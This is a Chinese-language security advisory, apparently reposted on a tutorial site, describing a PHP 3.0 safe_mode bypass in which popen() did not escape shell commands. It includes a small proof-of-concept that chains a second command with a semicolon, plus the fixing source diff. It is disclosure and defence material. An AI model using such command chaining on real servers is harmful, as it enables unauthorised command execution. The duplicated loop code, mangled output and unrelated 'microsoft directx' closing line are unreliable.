受影響的系統: PHP 3.00
---------------------------------------- ------------------------------------------
說明:
PHP Version 3.0是一個HTML嵌入式腳本語言。其大多數語法移植於C、Java和Perl並結合了
PHP的特性。這個語言可以讓web開發者快速創建動態網頁。
因其執行在web伺服器上並允許使用者執行程式碼,PHP內建了稱為'safe_mode'的安全特性,
用於控制在允許PHP操作的webroot環境中執行指令。
其實作機制是透過強制執行shell指令的系統呼叫將shell指令傳送到EscapeShellCmd()
函數,此函數用於確認在webroot目錄外部不能執行指令。
在某些版本的PHP中,使用popen()指令時EscapeShellCmd()卻失效了,造成惡意使用者可
以利用'popen'系統呼叫進行非法操作。
----------------------------------------------- ---------------------------------
測試程式:
警告:以下程式(方法)可能帶有攻擊性,僅供安全研究與教學之用。用戶風險自負!
<?php
$fp = popen("ls -l /opt/bin; /usr/bin/id", "r");
echo "$fp<br>n";
while($line = fgets($fp, 1024)):
printf("%s<br>n", $line);
endwhile;
pclose($fp);
endwhile;
pclose($fp);
phpinfo();
?>
輸出結果如下:
1
total 53
-rwxr-xr-x 1 root root 52292 Jan 3 22:05 ls 30(wwwrun) gid=65534(nogroup) groups=65534(nogroup)
and from the configuration values of phpinfo():
safe_mode 0 1 s
------------ -------------------------------------------------- ------------------
建議:
Index: functions/file.c
============== ==================================================== ===
RCS file: /repository/php3/functions/file.c,v
retrieving revision 1.229
retrieving revision 1.230
diff -u -r1.229 -r1.230
--- functions/file.c 2000/01/01 04:31:15 1.229
+++ functions/file.c 2000/01/03 21:31:31 1.230
@@ -26,7 +26,7 @@
| Authors: Rasmus Lerdorf <rasmus@lerdorf.on.ca> |
+---------------------- ------------------------------------------------+
*/
-/* $Id: file.c,v 1.229 2000/01/01 04:31:15 sas Exp $ */
+/* $Id: file.c,v 1.230 2000 /01/03 21:31:31 kk Exp $ */
#include "php.h"
#include <stdio.h>
@@ -51,6 +51,7 @@
#include "safe_mode.h"
#include "php3_list.h"
#include "php3_string.h"
+#include "exec.h"
#include "fileh"
#if HAVE_PWD_H
#if MSVC5
@@ -575,7 +576,7 @@
pval *arg1, *arg2;
FILE *fp;
int id;
- char *p;
+ char *p, *tmp = NULL;
char *b, buf[1024];
TLS_VARS;
@@ -600,7 +601, 11 @@
} else {
snprintf(buf,sizeof(buf),"%s/%s",php3_ini.safe_mode_exec_dir,arg1->value.str.val);
}
}
- fp = popen(buf,p);
+
+ tmp = _php3_escapeshellcmd(buf);
+ fp = popen(tmp,p);
+ efree(tmp); /* temporary copy, no longer necessary */
+
if (!fp) {
php3_error(E_WARNING,"popen("%s","%s") - %s",buf,p,strerror (errno));
RETURN_FALSE;以上就介紹了microsoft directx PHP3 safe_mode 失效漏洞,包括了microsoft directx方面的內容,希望對PHP教程有興趣的朋友有所幫助。